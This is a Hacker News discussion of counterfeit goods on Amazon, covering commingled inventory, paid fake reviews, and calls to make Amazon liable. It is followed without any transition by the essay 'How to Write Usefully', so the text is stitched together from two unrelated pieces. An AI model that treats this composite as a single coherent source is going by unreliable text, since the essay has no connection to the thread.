I can also say that the company where I work has already had problems with Amazon multiple times. True, they are maybe a bit of a different kind, but I think that dollars are the most important thing for Amazon, even if they have to fk with customers or third-party sellers in one way or another. That's also why I only buy at Amazon if it's really necessary and it's from a big company, like Nintendo or so.

There's also now a law in Germany (or there soon will be) which prohibits destroying brand-new stock just because it did not sell. That happened mainly (I'd say) because of Amazon, where it went public that, on average, 2 trucks filled with only that kind of product left a single warehouse per day.

agumonkey(877) 1 day ago [-]

The web feels like a huge fine grained stress test to reassess all the reasons why most of the world was the way it was.

BiteCode_dev(10000) 1 day ago [-]

Unfortunate, brand loyalty doesn't mean anything anymore:

- a lot of companies don't manufacture the product themselves

- they don't even manufacture two products from the same subcontractor

- sometimes, the same product, between two batches, is not produced by the same sub-contractor

- big players just don't care. Cisco is not going to lose business because you chose not to buy, and most people won't follow you to allow the boycott to have enough weight

- PR firms are so powerful now they can make any brand great again. See Microsoft. I guarantee there will be people who want to answer this comment stating how they really are a good firm now, and cite great things they do. Yet I bet in 10 years, we will learn about some other horrible things they did. Again. It's been like that for decades. PR works extremely well now; people genuinely live the feeling they've been led to by those amazing consent manufacturers.

- a brand is dead? Don't worry, it will be renamed into another one. Or subcontract for another one. You will buy its products again, you just won't know you do.

Gene_Parmesan(10000) 1 day ago [-]

> I find that I buy more in smaller e-commerce shops, because I find they're much less affected by the review fraud

I've had to start doing this with violin strings. The sort of strings I like are pretty damn expensive (~$120 list price), so originally, any chance I could get to save say 10% I would take. But I heard way too much about fakes being shipped from Amazon 3rd party sellers, so I've started just buying everything from Shar (which, it turns out, provides steep discounts fairly regularly; you just have to wait for them).

onetimemanytime(461) 1 day ago [-]

>>Now I find that I rely more and more on brands to decide which things I buy,

Amazon used to be that brand for me; I trusted that I'd get a real product vetted by real reviewers and by Amazon. Adios.

erentz(1711) 2 days ago [-]

I see the Amazon fake products problem as related to the social network fake news problem. In both cases you have a company that wants to both have its platform cake and eat its publisher cake at the same time. (Sorry for the bad spin on that phrase there.)

One important part of our solution here has to be that we force these companies to take a position one way or the other. So in Amazon's case it would need to decide - am I a platform for companies to set up their own online shop and provide fulfillment services to? Or am I myself the online shop?

In the latter case they become responsible for the product, like any business. In the former, they aren't. But in the former they now need to act as just a platform and not provide all the branding that makes it look like you're buying from Amazon. So they'd be more akin to Shopify or something, I suppose. Every fly-by-night shop that wants to set up needs to set up its own branding, and that way brand reliability and recognition still works and items are no longer commingled.

pmart123(4300) 2 days ago [-]

I agree that in some capacity the growth or greed to increase DAU and engagement for social networks is similar to Amazon's desire to grow SKUs and purchase volume. Amazon mixing SKUs maybe relates to when the press piggybacks off of the same initial headline, as it creates distrust and makes people question the quality of the product.

There's a big difference though. Social media allows many individual voices, and much like the printing press, allows previously unheard voices to be heard and to have reach. Therefore, the world's expert can call out a journalist for being wrong immediately, making it seem like "fake news" is more common than it was previously.

Amazon is actually causing distrust around product quality when there wasn't any before. Consumers may have trusted Colgate's toothpaste, but if it isn't actually Colgate's toothpaste, yet it poisons someone, it becomes Colgate's problem too. This would be like Facebook or Twitter allowing any account to adopt a WSJ or NYTimes verified badge: one of those accounts publishes fake news, and then the paper itself has a problem too.

JKCalhoun(4302) 2 days ago [-]

Yeah, been going to AliExpress more and more. If Amazon is going to be a platform for other companies, I'll go with the cheapest one....

ajmurmann(10000) 1 day ago [-]

Just stopping the insane co-mingling of products from different sellers would go such a long way. The co-mingling is in essence destroying accountability and evidence!

empath75(1911) 2 days ago [-]

I think you solve it by making amazon directly liable for fraud on their platform. They'd clean up the problem pretty quickly after losing a few billion dollars in lawsuits.

tracer4201(10000) 2 days ago [-]

Disclaimer: I don't own amazon directly but do own funds where Amazon is a significant chunk.

I don't agree with this kind of regulation. It's simply not the government's role to decide. You as a seller are not forced to sell on Amazon. I say that as the spouse of a seller who owns a store on eBay that's continued to be successful. We had a bad experience selling on Amazon and are better off without them. Of course that's just our experience, but I'm not convinced Amazon is a monopoly here.

I do think Amazon needs to be held liable for fake products and whatever damage they cause its customers. Amazon simply selling goods with no liability of fraudulent items is a disgrace, and I don't think they will change until we ram some regulation down their throat.

the_snooze(10000) 2 days ago [-]

>I see the Amazon fake products problem as related to the social network fake news problem. In both cases you have a company that wants to both have its platform cake and eat its publisher cake at the same time. (Sorry for the bad spin on that phrase there.)

These companies innovate by showing off a layer of whiz-bang techy goodness so people don't notice that they've simply externalized all the responsibility and internalized all the profits.

TeMPOraL(2736) 2 days ago [-]

> I see the Amazon fake products problem as related to the social network fake news problem.

Brought it up elsewhere[0], but I think you're right in more than one way. Beyond publisher vs. platform issue, fake news are the digital equivalent to counterfeiting; they're to news - and in general, to information media[1] - what Amazon counterfeits are to physical products.

--

[0] - https://news.ycombinator.com/item?id=22399726

[1] - Which include all digital media and most physical books.

mschuster91(3373) 2 days ago [-]

For the products that are actually regulated, like the child safety seats: hold Amazon liable for selling product that is illegal.

Make it expensive for Amazon to not police the shit that third parties are throwing on the marketplace - and soon you won't see any fakes any more.

You want to know where Bezos got his billions? Partially because Amazon outright shits on all the regulation that traditional brick-and-mortar places have to follow - like not selling product that is illegal, counterfeit, or offensive.

gowld(10000) 1 day ago [-]

> offensive

Ugh.

KaoruAoiShiho(4125) 2 days ago [-]

Is it not possible to look at the seller to tell if it's the real company selling the product? I wouldn't buy branded goods from some no-name seller; that's no better than ebay.

matsemann(10000) 2 days ago [-]

If multiple sellers sell the 'same' item and use Amazon as the warehouse, the items can be binned together and you get one at random from any one of the sellers, no matter which one you actually bought from.

ck2(316) 2 days ago [-]

Note that Amazon themselves (as the seller) will sometimes grey-market source items if they don't/can't cut a good deal with the manufacturer.

They admit this. Which means buying from them directly is no guarantee.

Scoundreller(4284) 1 day ago [-]

I can't blame them. Some manufacturers are very stuck on manufacturer-approved retailers to keep prices high, while ostensibly claiming any other reason.

Should be unlawful imo.

someonehere(10000) 2 days ago [-]

I have friends who are no longer buying from Amazon, especially friends with kids. You can't trust anything meant to keep your kids safe when crap like this is allowed. Amazon is in a race to flood the market with availability at the cost of consumer confidence.

Remember all the hoverboard fires you saw on the news several years ago? They weren't knockoffs, but items sold without any real safety certification in mind. Amazon only cares when something bad happens on the news and they're involved.

chx(812) 1 day ago [-]

> items sold that didn't have any real safety certifications in mind.

The amount of electronics sold without a UL/ETL cert on Amazon is staggering. Many companies no longer bother getting one because there's no one to stop them from selling uncertified crap. Also, we have seen unscrupulous dealers slapping a fake ETL mark on their product, and even when Intertek contacted Amazon they didn't take it down!

Hell, there's an 'international' power strip sold under many different names which provides three NEMA 5-15R outlets from a single IEC C5/C6 coupler (the IEC standard rates the coupler at up to 2.5A, UL certifies it up to 13A, but still, the NEMA connector is rated 15A), and to top it off, it is sold with an ungrounded cable. I often see it recommended on travel forums, for real. I can't even decide whether shock or fire is the bigger hazard with this. Someone eventually will burn down an airbnb with it, and then the finger pointing will start.

nappy-doo(4310) 2 days ago [-]

My neighbor bought a set of woodworking clamps from Amazon. When the ~25lb. box arrived, the driver threw them up onto his porch (his house is quite raised from the street), and he has video of it damaging his siding as it took three attempts for the driver to get them over the railing onto his porch. When he contacted Amazon, they said to contact some insurance company they had. When my neighbor called the insurance company, they never returned the call.

He then began researching the insurance company, which was owned by Amazon but wasn't listed as a valid insurance company in Massachusetts. He contacted Amazon again and asked, 'Would you like me to call the insurance commissioner and attorney general to report that you're operating a non-registered insurance company in Massachusetts?' Someone was out to fix his siding in 3 days, and they painted the porch as well (due to some paint matching problem).

Despite how much I love being able to order stuff, and not have to go out, Amazon is pretty scum-tacular.

dimnsionofsound(10000) 1 day ago [-]

Mildly related, here's another instance of harmful things you can buy on Amazon: "negative ion" trinkets that are actually radioactive [1].

[1]: https://youtu.be/C7TwBUxxIC0

thaumaturgy(2269) 2 days ago [-]

I went from being an enthusiastic fan of Amazon Prime and a $50k spend one year [+] to closing my Amazon account and then warning other people away from it in the space of about five years.

I can't recall any other business from which I've moved so quickly and so far from one end of the spectrum of enthusiasm to the other.

[+] Most of it was for business -- parts and equipment for customers; it was often cheaper that way than through my wholesale supplier.

wombat-man(10000) 2 days ago [-]

Cancelled my prime this year, haven't looked back. A lot of retailers offer free shipping if you order a certain dollar amount and while they have a smaller selection, I can be pretty sure I'm not receiving anything fake. They also tend to have a lot less noise in search results.

main downside is I'm having to order from multiple places, but it hasn't been too bad.

koboll(4320) about 24 hours ago [-]

I'm astonished no competitor like Walmart or Wayfair has gone on the offensive yet with TV ads stating flat-out that you can't trust Amazon anymore because their counterfeit problem is out of control. They'd make a killing with defectors.

miked85(4098) 2 days ago [-]

I have started buying most products directly from manufacturers' websites or in physical stores now. The amount of fake products on Amazon is appalling; I wonder why they don't put effort into stopping this.

arbitrage(10000) 1 day ago [-]

I tried this recently. Bought something from the manufacturer, paid extra for shipping & handling, waited longer, the whole bit. I felt good about myself, because I don't want to be taken advantage of anymore, and hey ... I'm buying directly from the manufacturer, so they get a higher cut. Right?

No. I bought directly from the manufacturer's website, paid them, got email from them, the whole bit ... and it was fulfilled and delivered by Amazon. I got an amazon box, and an amazon invoice, and an amazon product.

You can't win anymore. Online commerce is subverted. What you see, no matter how savvy a consumer you are or how much experience you have with online shopping, is no longer guaranteed to be what you get.

IshKebab(10000) 1 day ago [-]

Is this an American problem? As far as I know I've never received a fake product from Amazon in the UK.

jccooper(4207) 2 days ago [-]

The actual solution would require them giving up being a 'platform' or would require changes that would make logistics and/or management of the platform take much more effort. They'd rather let a 'fraud department' keep chopping off hydra heads at a much lower cost.

VLM(10000) 2 days ago [-]

Very few products on Amazon are sold by the creator. Virtually everything is sold by a mixture of middlemen and importers and drop shippers.

It's virtually impossible to tell the difference between a product I'm middle-manning that's interpreted by investigators as real, and a product that's interpreted as fake.

With books, nobody really minds if, conceptually, a book sat unopened on a bookstore shelf with the general public touching and pawing it occasionally, vs. a book that sat pristine, untouched, and cleaner on my home bookshelf, although one is marketed as 'new' and one as 'used'; in practice it usually doesn't matter. Also see the weirdness with $10 'Indian subcontinent only' textbooks that normally sell for $200 to sucker American students; nobody complains their book was 'fake' with a 95% discount to keep them quiet.

On the other hand, do that same game with toothbrushes and in roll the complaints.

This may be a problem inherent to online shopping in the long term. A copy of 'Numerical Recipes in C edition 3' is a fungible commodity. Apparently, as per the linked article, that is not the case with fad overpriced gloves and toothbrushes. Possibly that type of product is inherently unsuitable for online purchase.

marcinzm(10000) 2 days ago [-]

>I wonder why they don't put effort into stopping this.

Because they make more money than they lose as a result while driving competitors into bankruptcy. Eventually they'll make a big public spectacle of getting it fixed (once the economics stop being in their favor) and everyone will forgive them.

mrweasel(4207) 1 day ago [-]

I honestly don't think Amazon really care, unless you sell fake Amazon branded products.

agrippanux(4308) 2 days ago [-]

I started buying electronics at my local physical Best Buy. I thought 4 years ago I would never step inside a Best Buy again but a string of obvious fakes from Amazon changed my mind.

derekp7(4256) 1 day ago [-]

A couple years back I impulse-purchased a Google Chromecast at a local Walmart. When I went to open it up at home, the seal looked a bit funky, like it had been carefully peeled back and put back in place.

What it contained looked like a Chromecast, but was actually a knockoff, which I never could get to associate with my network or get working.

Apparently someone bought this cheap one online, didn't like it, bought the real one at Walmart and put the fake one back in the box and returned it to the store.

jtms(4318) 1 day ago [-]

I never in a million years thought I'd be suggesting this, but Walmart.com offers a similar level of convenience and I'd wager you're far less likely to receive fake stuff

Answerawake(10000) about 23 hours ago [-]

I disagree. This is an anecdote, but I ordered a bag of coffee through their 'Ship to Store' option. When it came time to go to the store to pick it up, I waited about an hour to receive my item. Their setup is very good in theory: you walk into the special 'pick up' area of the store, then check in. From there someone is supposed to go to the back and fetch your item. That person was nowhere to be found. After I alerted the manager, that person eventually showed up and then proceeded to look around for the item. They then decided to call in a colleague, who took even longer to find the item. Turns out it was in a box right in front of them. All in all I wasted an hour trying to get a small bag of coffee. I'm gonna try again because I want this thing to be successful, but man, was it a 'nails on chalkboard' experience.

microdrum(4028) 1 day ago [-]

Unpopular / true opinion: even more Trumpian tariffs on China will help fix this problem.

sky_rw(10000) 1 day ago [-]

More unpopular / true opinion: Coronavirus will probably fix this problem.

viburnum(3184) 2 days ago [-]

I really, really hate being a sucker so for me it's never worth it to buy from Amazon anymore. I'll pay a few dollars more to avoid the stress.

gdulli(10000) 2 days ago [-]

The good news is, it's not even necessarily true that you pay more when buying elsewhere anymore. Amazon is coasting on that reputation but they're no longer subsidizing customers like they used to.

101008(10000) 2 days ago [-]

Sorry if this is offtopic. I was planning to buy a Google Pixel 3A from Amazon in a week (it's cheaper than from the Google Store). Are mobile phones also counterfeited on Amazon? Or do they not aim to fake stuff like that? Thank you. (I am from a 3rd-world country and travelling to the USA next week)

jschwartzi(4279) 1 day ago [-]

No, but they're extremely likely to be refurbished but sold as new. For every phone I've bought off Amazon that was sold as 'new', this was the case.

v77(10000) 1 day ago [-]

I just bought a Pixel 2 from Amazon.ca and it seems fine.

richardxia(10000) 2 days ago [-]

I would be a little bit careful. I don't know if there's a risk of counterfeiting, but I once bought what I thought was supposed to be a US-region Moto X2 but instead got a European-region one. The most important difference, besides getting a different power adapter, was the fact that there's actually a different wireless antenna chip, which did not have LTE bands for my carrier in the US.

gurumeditations(10000) 2 days ago [-]

Personally, any expensive electronics I buy in person, not from Amazon. Best Buy and the like are trustworthy.

philshem(4201) 1 day ago [-]

Nitpicking, but...

the original article title is 'I Bought These Things From Amazon Prime. Can You Tell Which Ones Are Real?'.

The current HN title is 'Which of these Amazon Prime purchases are real?'

The current HN title would be improved by replacing 'real' with 'authentic'. With 'real', I started the article assuming that the Ove-Glove was a fictitious product created by a designer or artist. It took some time to realize that 'real' means 'authentic'.

mrweasel(4207) 1 day ago [-]

It also doesn't matter that it's Amazon Prime, the Prime part has no influence on whether or not you risk buying fakes.

lukebuehler(10000) 2 days ago [-]

Gutsy for them to write such an article when they rely so much on affiliate links. Definitely makes me respect The Wire Cutter much more.

Maybe their article implies that as long as you purchase through their recommended links you'd be safe(r)?

ebg13(10000) 1 day ago [-]

> Definitely makes me respect The Wire Cutter much more.

I'll probably respect them more when they stop hypocritically linking to Amazon.

> Maybe does their article imply that as long as you purchase through their recommended links you'd be safe(er)?

The article implies that, but it's not true.

burlesona(3817) 2 days ago [-]

I agree, I thought that too. These days they almost always have two links to buy each product, I usually go for whatever isn't Amazon.

joeblau(3464) 1 day ago [-]

A few weeks ago, I bought some shampoo and conditioner from Amazon. I wanted a bulk size, and the bottle looked like it was from the official manufacturer. When I got the bottles, opened them, and used them, I could tell they were fake. The consistency of the product was terrible and the smell was overly harsh. I returned both of them and just ordered the products from the company website. Funnily enough, the company website didn't even have the sizes that were listed on Amazon. Over time, I've become more wary of buying household products on Amazon's website.

jschwartzi(4279) 1 day ago [-]

You're lucky you didn't keep putting that stuff on your hair or face. Back before cosmetics and beauty supplies were regulated in the US, there would be occasional news stories of shampoos removing hair or causing rashes. A high school teacher showed us, as an example, a newspaper article from that period about mascara making several women permanently blind.

chrisseaton(3104) 2 days ago [-]

Why is buying them with a Prime subscription relevant to the story?

mjs(3033) 2 days ago [-]

The more crucial difference is that the products were sold by third party sellers. I'm assuming counterfeit goods are almost never a problem if the seller is Amazon.

Marsymars(10000) 2 days ago [-]

Because the average Amazon buyer sees 'eligible for Prime' as an Amazon-backed indicator of quality.

ryandetzel(3901) 1 day ago [-]

I've tried to buy directly from the manufacturer four times in the last two months; every single time it was more expensive than buying from Amazon, and these are things that are not easily faked, so I'm sure they're legit. For one of them, I contacted the manufacturer to see if they would at least match the $20 difference on Amazon, and they said just to order it from Amazon. Wtf.

asdff(10000) 1 day ago [-]

It depends on the products. Old school department store brands will have an inflated price on their site compared to amazon, but I usually find name brand electronics to be no cheaper on amazon than other sites, or even the manufacturer directly.

intopieces(4315) 2 days ago [-]

There's a follow-on question that I'd like to raise, which is: 'Are you rich enough to care?' In the race to the bottom on prices, it becomes a mark of wealth when you have the time and money to verify your own purchases, or to shop at more reputable retailers. I'm in that category, but could easily see myself being too cash-strapped / too busy to do anything about a fake product being shipped to me from Amazon. I'd probably shrug.

burlesona(3817) 2 days ago [-]

I mean, kinda. But you can buy most of the stuff that you'd otherwise get on Amazon from Costco, Target, or Walmart online, and not have to worry about it being a crappy knock off made with leaded paint. So, I think most people are rich enough to care that much.

throwaway122378(10000) 1 day ago [-]

Should Amazon be held liable for fake products sold on their platform the same way Facebook should be liable for fake news published on theirs?

clSTophEjUdRanu(4315) 1 day ago [-]

Yes.

However I don't consider this and what Facebook is doing to be the same.

rasz(4316) 1 day ago [-]

You don't directly pay for reading fb posts. fb posts never burned anybody's house down.

tyingq(4263) 2 days ago [-]

'Getting the fake gloves removed from Amazon can be a long process, Hirsch said, taking weeks or even months of playing whack-a-mole with counterfeit sellers'

That's the brand owner saying that. I'd love to see an Amazon response to that.

Nasrudith(10000) 2 days ago [-]

Personally the brand owner makes me trust them as far as I can throw them as they have a fundamental interest in hampering secondary markets and undermining right of first sale. Sure there are valid concerns but it becomes 'CEOs claim higher CEO compensation main factor linked to better company performance'.

foxfired(2140) 1 day ago [-]

Time to pack the kids in the car and drive to your local hardware store.

No, seriously. Go to your local hardware store. If the quality of your purchase matters, then the surest way to get a good quality product is to go to the store and pick it up yourself. If for some reason you get a fake, you can drive back to the store and they'll be happy to replace it. You don't have to talk to a faceless corporation.

ken(3848) 1 day ago [-]

Great idea for some products, infeasible for others. I recently needed a Firewire cable, on a day's notice, and after much searching I concluded there's no longer any store in Seattle which sells computer components in person, especially outside of normal business hours.

The closest I found was Fry's (Renton, 30 min away), and they're doing their darndest to go out of business. A Firewire cable is one of the few items they have on their shelves. It's not name-brand, and if it didn't work, I'd be SOL.

skizm(10000) 2 days ago [-]

Just add Twitter certified check marks to third party sellers. Have official amazon quality control for those sellers and everyone else is a gamble. If I buy from the Nike seller with the blue check mark, I know I'm getting the real thing. Seems like that could work.

miked85(4098) 2 days ago [-]

As long as Amazon continues to co-mingle products, that wouldn't matter.

squarefoot(4122) 2 days ago [-]

Fake reviews also contribute to more fake and low quality products being sold. It looks like Amazon simply doesn't care.

https://thehustle.co/amazon-fake-reviews

FTA:

'One stay-at-home mom from Kentucky told me she makes $200-300 per month leaving positive reviews for things like sleep masks, light bulbs, and AV cables.'

"Do you actually like the products?" I asked.

"I don't know," she wrote. "I never use them."

heavyset_go(4298) 2 days ago [-]

I posted about this on HN recently[1]. Within the last month, I've been getting an increasing amount of native ads on different platforms for 'Free [Product]!'. If you engage the ad, you find out that the ad-purchaser wants you to buy the advertised product and leave a positive review for it on Amazon, after which they'll refund you for the cost of the product.

Some of these items have thousands of positive reviews[1], which is misleading to consumers who rely on honest reviews to guide their purchasing behavior. Also, it is almost comical how difficult it is to reach out to Amazon about this issue as a user.

In the end, I just contacted my state Attorney General's Consumer Protection division and the FTC.

[1] https://news.ycombinator.com/item?id=22388067

dpacmittal(10000) 1 day ago [-]

Amazon's strategy is to create mistrust of any product other than its in-house brands.

Nasrudith(10000) 2 days ago [-]

I'll bite - how would them caring make any difference in terms of quality of 'fake' reviews?

The way I see it, the problem is unsolvable. There is no mathematical way to absolutely determine the truth of reviews, and it is fundamentally an arms race. No measure they could take could keep it true and free of deception.

Shivetya(611) 1 day ago [-]

Well, when Amazon takes steps to reduce fraud, people scream to high hell about how unfair it is to the small business trying to sell product. Take the case of Apple and Amazon working a deal where Apple products can only be sold by Apple or those whom Apple authorizes.

I know the headache of trying to find a Silpat cooking mat; the number of look-alike fakes is astounding, and worse, they use the brand name when they clearly are not that manufacturer.

So the only recourse is to have a setup similar to the Amazon and Apple deal. Anyone wishing to sell a branded product must provide proof to Amazon, which includes the manufacturer backing the claim that they are authorized to sell that product. Not by product line, but product by product.

nomel(10000) about 21 hours ago [-]

After spending $50 on a 'Recommended' and 'Prime' counterfeit PS4 controller (proven by a teardown), I no longer buy electronics from Amazon. With a brick and mortar, some sort of incoming quality control still seems to be in place.

Timothycquinn(10000) 1 day ago [-]

I just watched a CBC Marketplace spot on this topic. What scared me the most was the danger of toxic materials in fake products, especially makeup. Some knockoffs of brand-name lipsticks had mercury levels hundreds of times higher than the maximum levels recommended by industry standards.

amdelamar(10000) 1 day ago [-]

Netflix has a short documentary on this very thing. It was really eye-opening that counterfeit makeup and cosmetics are not only bad for businesses but they can be physically harmful to the body/face, resulting in some people being rushed to the hospital.

The series is called Broken and the episode on cosmetics is 'Makeup Mayhem' https://www.netflix.com/title/81002391

mindslight(10000) 2 days ago [-]

The switcheroo problem described in the article simply does not exist, say, over on Ebay. On Ebay, you directly know if you are buying from a legitimate distributor, a small-time grey market / surplus dealer, or a knockoff shop. There are plenty of products for which knockoffs/generics are good enough, so simplistically 'banning fakes' is not the solution either. The problem is this obscuring of the actual supplier, which Amazon could fix tomorrow if their entire business didn't revolve around using that confusing UI to mislead customers with dark patterns.

I'm continually amazed at the popularity of Amazon. It goes to show how powerful advertising, social distortion, and the sunk cost fallacy ('prime') are. For example, Amazon has never had good prices on anything, and yet that myth persists. Presumably the same people that repeat this can't even be bothered to just check eg walmart.com. (Walmart does find some new way to disappoint me every time I step in there. It's just so utterly huge that it's foolish to ignore.)

greenyoda(1349) 2 days ago [-]

> On Ebay, you directly know if you are buying from a legitimate distributor, small time grey market / surplus dealer, or a knockoff shop.

Would you mind explaining how you can figure this out? (I've never bought anything on Ebay, so I'm completely ignorant about how it works.)

overcast(4273) 1 day ago [-]

How do fake reviews get past order verification? Or is that tag complete bullshit?

cddotdotslash(4148) 1 day ago [-]

There are lots of companies that will pay you the price of the item + $X to buy the product and leave the review.

gowld(10000) 1 day ago [-]

Do the math: product price times number of reviews equals cost of fake reviews.
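
A toy version of that arithmetic, with made-up numbers (and including the per-review bounty mentioned above):

# Back-of-the-envelope cost of buying verified fake reviews.
# All numbers below are hypothetical.
product_price = 20.00   # the reviewer buys the item; the seller reimburses it
bounty = 5.00           # the '+ $X' paid on top, per review
num_reviews = 500

total_cost = (product_price + bounty) * num_reviews
print(f'{num_reviews} verified reviews cost about ${total_cost:,.0f}')
# -> 500 verified reviews cost about $12,500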

fenwick67(10000) 2 days ago [-]

Walmart's online store is now my go-to for most household products. Free 2-day shipping without a subscription and the ability to actually vet their supply chain mean it's basically always better.

aidenn0(4137) 2 days ago [-]

Doesn't wal-mart allow drop-shippers to list on their website?





Historical Discussions: How to Write Usefully (February 21, 2020: 806 points)
How to Write Usefully (February 21, 2020: 1 points)

(807) How to Write Usefully

807 points 4 days ago by r_singh in 2698th position

paulgraham.com | Estimated reading time – 16 minutes | comments | anchor

February 2020

What should an essay be? Many people would say persuasive. That's what a lot of us were taught essays should be. But I think we can aim for something more ambitious: that an essay should be useful.

To start with, that means it should be correct. But it's not enough merely to be correct. It's easy to make a statement correct by making it vague. That's a common flaw in academic writing, for example. If you know nothing at all about an issue, you can't go wrong by saying that the issue is a complex one, that there are many factors to be considered, that it's a mistake to take too simplistic a view of it, and so on.

Though no doubt correct, such statements tell the reader nothing. Useful writing makes claims that are as strong as they can be made without becoming false.

For example, it's more useful to say that Pike's Peak is near the middle of Colorado than merely somewhere in Colorado. But if I say it's in the exact middle of Colorado, I've now gone too far, because it's a bit east of the middle.

Precision and correctness are like opposing forces. It's easy to satisfy one if you ignore the other. The converse of vaporous academic writing is the bold, but false, rhetoric of demagogues. Useful writing is bold, but true.

It's also two other things: it tells people something important, and that at least some of them didn't already know.

Telling people something they didn't know doesn't always mean surprising them. Sometimes it means telling them something they knew unconsciously but had never put into words. In fact those may be the more valuable insights, because they tend to be more fundamental.

Let's put them all together. Useful writing tells people something true and important that they didn't already know, and tells them as unequivocally as possible.

Notice these are all a matter of degree. For example, you can't expect an idea to be novel to everyone. Any insight that you have will probably have already been had by at least one of the world's 7 billion people. But it's sufficient if an idea is novel to a lot of readers.

Ditto for correctness, importance, and strength. In effect the four components are like numbers you can multiply together to get a score for usefulness. Which I realize is almost awkwardly reductive, but nonetheless true.
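
(A minimal sketch of that multiplicative score, purely for concreteness; the 0-to-1 component values are invented, not from the essay:)

# Usefulness as a product of four components, each scored 0..1.
# Because the components multiply, a zero anywhere zeroes the total:
# a false essay is useless no matter how important or novel it is.
def usefulness(correctness, importance, novelty, strength):
    return correctness * importance * novelty * strength

print(usefulness(0.9, 0.8, 0.7, 0.9))  # bold, true, fresh -> 0.4536
print(usefulness(0.0, 1.0, 1.0, 1.0))  # false -> 0.0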

_____

How can you ensure that the things you say are true and novel and important? Believe it or not, there is a trick for doing this. I learned it from my friend Robert Morris, who has a horror of saying anything dumb. His trick is not to say anything unless he's sure it's worth hearing. This makes it hard to get opinions out of him, but when you do, they're usually right.

Translated into essay writing, what this means is that if you write a bad sentence, you don't publish it. You delete it and try again. Often you abandon whole branches of four or five paragraphs. Sometimes a whole essay.

You can't ensure that every idea you have is good, but you can ensure that every one you publish is, by simply not publishing the ones that aren't.

In the sciences, this is called publication bias, and is considered bad. When some hypothesis you're exploring gets inconclusive results, you're supposed to tell people about that too. But with essay writing, publication bias is the way to go.

My strategy is loose, then tight. I write the first draft of an essay fast, trying out all kinds of ideas. Then I spend days rewriting it very carefully.

I've never tried to count how many times I proofread essays, but I'm sure there are sentences I've read 100 times before publishing them. When I proofread an essay, there are usually passages that stick out in an annoying way, sometimes because they're clumsily written, and sometimes because I'm not sure they're true. The annoyance starts out unconscious, but after the tenth reading or so I'm saying 'Ugh, that part' each time I hit it. They become like briars that catch your sleeve as you walk past. Usually I won't publish an essay till they're all gone — till I can read through the whole thing without the feeling of anything catching.

I'll sometimes let through a sentence that seems clumsy, if I can't think of a way to rephrase it, but I will never knowingly let through one that doesn't seem correct. You never have to. If a sentence doesn't seem right, all you have to do is ask why it doesn't, and you've usually got the replacement right there in your head.

This is where essayists have an advantage over journalists. You don't have a deadline. You can work for as long on an essay as you need to get it right. You don't have to publish the essay at all, if you can't get it right. Mistakes seem to lose courage in the face of an enemy with unlimited resources. Or that's what it feels like. What's really going on is that you have different expectations for yourself. You're like a parent saying to a child 'we can sit here all night till you eat your vegetables.' Except you're the child too.

I'm not saying no mistake gets through. For example, I added condition (c) in 'A Way to Detect Bias' after readers pointed out that I'd omitted it. But in practice you can catch nearly all of them.

There's a trick for getting importance too. It's like the trick I suggest to young founders for getting startup ideas: to make something you yourself want. You can use yourself as a proxy for the reader. The reader is not completely unlike you, so if you write about topics that seem important to you, they'll probably seem important to a significant number of readers as well.

Importance has two factors. It's the number of people something matters to, times how much it matters to them. Which means of course that it's not a rectangle, but a sort of ragged comb, like a Riemann sum.
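
(One way to sketch that ragged comb, with invented reader groups and weights: importance as a sum, over groups, of reader count times how much it matters to that group:)

# Importance ~ sum over reader groups of (readers) * (how much it matters).
# A Riemann-sum-like total over a ragged audience; numbers are hypothetical.
audience = [
    (10,      0.9),   # a handful of experts who care a lot
    (1_000,   0.3),   # practitioners who care somewhat
    (100_000, 0.01),  # casual readers who care a little
]
importance = sum(readers * weight for readers, weight in audience)
print(importance)  # -> 1309.0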

The way to get novelty is to write about topics you've thought about a lot. Then you can use yourself as a proxy for the reader in this department too. Anything you notice that surprises you, who've thought about the topic a lot, will probably also surprise a significant number of readers. And here, as with correctness and importance, you can use the Morris technique to ensure that you will. If you don't learn anything from writing an essay, don't publish it.

You need humility to measure novelty, because acknowledging the novelty of an idea means acknowledging your previous ignorance of it. Confidence and humility are often seen as opposites, but in this case, as in many others, confidence helps you to be humble. If you know you're an expert on some topic, you can freely admit when you learn something you didn't know, because you can be confident that most other people wouldn't know it either.

The fourth component of useful writing, strength, comes from two things: thinking well, and the skillful use of qualification. These two counterbalance each other, like the accelerator and clutch in a car with a manual transmission. As you try to refine the expression of an idea, you adjust the qualification accordingly. Something you're sure of, you can state baldly with no qualification at all, as I did the four components of useful writing. Whereas points that seem dubious have to be held at arm's length with perhapses.

As you refine an idea, you're pushing in the direction of less qualification. But you can rarely get it down to zero. Sometimes you don't even want to, if it's a side point and a fully refined version would be too long.

Some say that qualifications weaken writing. For example, that you should never begin a sentence in an essay with 'I think,' because if you're saying it, then of course you think it. And it's true that 'I think x' is a weaker statement than simply 'x.' Which is exactly why you need 'I think.' You need it to express your degree of certainty.

But qualifications are not scalars. They're not just experimental error. There must be 50 things they can express: how broadly something applies, how you know it, how happy you are it's so, even how it could be falsified. I'm not going to try to explore the structure of qualification here. It's probably more complex than the whole topic of writing usefully. Instead I'll just give you a practical tip: Don't underestimate qualification. It's an important skill in its own right, not just a sort of tax you have to pay in order to avoid saying things that are false. So learn and use its full range. It may not be fully half of having good ideas, but it's part of having them.
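
(A way to picture 'qualifications are not scalars': a hedge modeled as a small structure rather than a single confidence number. The fields below are illustrative guesses at a few of the dimensions named above:)

# A qualification as structured data, not one number: scope, evidence,
# certainty, and a falsifier. Field names are invented for illustration.
from dataclasses import dataclass

@dataclass
class Qualification:
    scope: str         # how broadly the claim applies
    evidence: str      # how the writer knows it
    certainty: float   # degree of confidence, 0..1
    falsifier: str     # what would show the claim false

q = Qualification(
    scope='essays, not fiction',
    evidence='personal practice',
    certainty=0.8,
    falsifier='a widely useful essay that is vague throughout',
)
print(q)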

There's one other quality I aim for in essays: to say things as simply as possible. But I don't think this is a component of usefulness. It's more a matter of consideration for the reader. And it's a practical aid in getting things right; a mistake is more obvious when expressed in simple language. But I'll admit that the main reason I write simply is not for the reader's sake or because it helps get things right, but because it bothers me to use more or fancier words than I need to. It seems inelegant, like a program that's too long.

I realize florid writing works for some people. But unless you're sure you're one of them, the best advice is to write as simply as you can.

_____

I believe the formula I've given you, importance + novelty + correctness + strength, is the recipe for a good essay. But I should warn you that it's also a recipe for making people mad.

The root of the problem is novelty. When you tell people something they didn't know, they don't always thank you for it. Sometimes the reason people don't know something is because they don't want to know it. Usually because it contradicts some cherished belief. And indeed, if you're looking for novel ideas, popular but mistaken beliefs are a good place to find them. Every popular mistaken belief creates a dead zone of ideas around it that are relatively unexplored because they contradict it.

